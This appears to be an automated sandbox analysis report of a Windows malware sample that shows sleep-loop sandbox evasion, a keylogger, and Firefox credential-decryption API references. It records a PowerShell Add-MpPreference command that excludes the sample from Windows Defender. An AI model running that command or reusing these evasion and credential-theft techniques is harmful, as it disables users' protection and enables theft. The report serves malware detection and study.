                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 7F50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 8F50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 9100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: A100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 1680000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599780Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599560Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597577Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596921Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596590Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595218Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594865Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6282Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3283Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeWindow / User API: threadDelayed 1672Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeWindow / User API: threadDelayed 8189Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeWindow / User API: foregroundWindowGot 1735Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 3500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4512Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599780s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599560s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597577s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -597031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596921s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596590s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -594865s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -594750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe TID: 5924Thread sleep time: -594531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599780Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599560Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597577Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596921Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596590Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595218Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594865Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeThread delayed: delay time: 594531Jump to behavior
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3726403928.0000000006A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF9548 LdrInitializeThunk,LdrInitializeThunk,6_2_06DF9548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"Jump to behavior
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager,q
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPr
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager0
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
